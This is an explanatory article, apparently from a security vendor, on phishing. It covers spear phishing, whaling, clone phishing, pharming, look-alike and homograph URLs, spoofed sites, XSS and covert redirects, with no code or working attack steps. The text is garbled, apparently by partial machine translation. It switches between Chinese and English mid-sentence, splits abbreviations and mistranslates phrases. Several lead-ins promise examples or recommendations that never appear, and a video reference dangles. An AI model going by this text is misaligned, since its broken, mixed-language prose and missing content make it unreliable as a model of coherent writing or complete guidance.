网络钓鱼是一种社会工程 网络安全攻击 企图诱骗目标泄露敏感/有价值的信息. 有时被称为“网络钓鱼骗局”,攻击者的目标是用户的登录凭证, 财务信息(如信用卡或银行账户), 公司数据, 以及任何可能有价值的东西.
Large organizations have long been at risk of phishing attacks due to their sheer size and opportunity for attackers to find holes in their security systems. 如果网络钓鱼攻击成功, an employee falling victim to the con could put their entire company in jeopardy of future turmoil. Organizations must assess how vulnerable they are to phishing attacks through penetration testing engagements and implementing the findings in 安全意识培训 programs.
最基本的定义是, the term phishing attack often refers to a broad attack aimed at a large number of users (or “targets”). 这可以被认为是“数量重于质量”的方法, 攻击者需要最少的准备, with the expectation that at least a few of the targets will fall victim to it (making the minimal up-front effort attractive even though the expected gain for the attacker isn’t usually all that big).
Phishing attacks typically engage the user with a message intended to solicit a specific response (usually a mouse click) via an emotion or desire, 例如下面的例子:
There are plenty of ways which attackers will attempt to get their hands on your information with a single email. 然而,通常有一些指标可以帮助确定电子邮件是否合法.
多年来,攻击者在网络钓鱼攻击方面不断创新, coming up with variations that require more up-front effort by the attacker but result in either a higher rate of victims or a higher value “payout” per victim (or both!).
当网络钓鱼攻击被定制为针对某个组织或特定个人时, 这被称为鱼叉式网络钓鱼. These attacks involve additional information gathered ahead of time and incorporate other elements—such as company logos, 公司或与公司合作的其他企业的电子邮件和网址, and sometimes professional or personal details of a target—in order to appear as authentic as possible. This additional effort by the attacker tends to pay off with a larger number of targets being duped.
了解更多关于 鱼叉式钓鱼攻击.
作为鱼叉式网络钓鱼攻击的一种变体, 捕鲸的目标是公司的高级管理人员. 捕鲸 attacks typically take specific responsibilities of these executive roles into consideration, 利用重点信息欺骗受害者. When a whaling attack successfully dupes a target, the attacker’s windfall can be substantial (e.g. 公司账户、公司机密等的高级凭据.).
了解更多关于 捕鲸的攻击.
鱼叉式网络钓鱼攻击的另一种变体是克隆式网络钓鱼. 在这次攻击中, targets are presented with a copy (or “clone”) of a 合法的消息 they had received earlier, 但是,攻击者在试图诱捕目标时做出了特定的改变.g. 恶意附件、无效URL链接等.). 因为这次攻击是基于之前看到的, 合法的消息, 它可以有效地欺骗目标.
和更多的
攻击者继续寻找新的和创造性的方法来攻击毫无戒心的计算机用户. 最近的网络钓鱼攻击 涉及到谷歌文档 这是通过一个目标认识的用户的电子邮件收到的, but would then try to gain the target’s Google login credentials (and also spam itself out to all emails in the target’s address book). 以及更多的被动攻击类型, 像嫁接, 是否会造成与其他网络钓鱼攻击相同的损失.
攻击者使用多种机制对目标进行网络钓鱼, 包括电子邮件, 社交媒体, 即时消息, 发短信, 而被感染的网站——有些攻击甚至是用老式电话进行的. 无论传递机制如何,网络钓鱼攻击都利用某些技术来执行.
One common deception attackers use is making a malicious URL appear similar to an authentic URL, increasing the likelihood that a user will not notice the slight difference(s) and click the malicious URL. While some of these manipulated links can be easily identified by targeted users who know to “check before they click” (e.g. 合法的URL.com vs. 可疑的URL leg1tbank.Com),诸如 同形异义字攻击, which take advantage of characters that look alike, can reduce the efficacy of visual detection.
链接并不是攻击者可以欺骗的唯一项目. 网站可以被欺骗或伪造,看起来好像他们是真实的, 通过使用诸如Flash或JavaScript之类的东西来创建合法网站, 允许攻击者控制URL如何显示给目标用户. This means that the site could show the legitimate URL even though the user is actually visiting the malicious website. 跨站点脚本编制 (XSS) takes this attack one step further: XSS attacks exploit vulnerabilities in the legitimate website itself, 允许攻击者呈现真实的网站(显示合法的URL, 合法的安全证书, etc.),然后悄悄窃取用户提供的凭据.
Redirects are a way attackers can force a user’s browser to interact with an unexpected website. Malicious redirects typically involve a website that is normally/willfully visited by the targeted user, 然后强行将所有访问者重定向到不受欢迎的页面, attacker-controlled网站. An attacker can accomplish this by compromising a website with their own redirection code or by discovering an existing bug on the target website that allows a forced redirect through specially crafted URLs, 例如.
顾名思义, covert redirects make it less obvious to the target user that they are interacting with an attacker’s site. A common scenario of a covert redirect would be where an attacker compromises an existing website by giving a new action to an existing “Log in with your Social Media account” button that a user might click in order to leave a comment. This new action collects the 社交媒体 login credentials the user provided and sends them to the attacker’s website before proceeding to the actual 社交媒体 website, 让目标用户一无所知.
以下建议旨在防止和解除网络钓鱼攻击的成功:
这是周三白板的一部分, 高级产品营销经理, 贾斯汀•布坎南, 讨论员工如何识别工作空间中潜在的网络钓鱼威胁.
另外, it's also good practice to regularly scan user and infrastructure systems for malware and keep them current on software updates/补丁.
网络钓鱼攻击的广度和攻击方法可能听起来很可怕, 但是经过适当的培训,了解什么是网络钓鱼攻击, 它是如何工作的, 以及它如何伤害用户和他们的组织, you can help ensure you’re as prepared as possible to recognize the threat and mitigate it accordingly.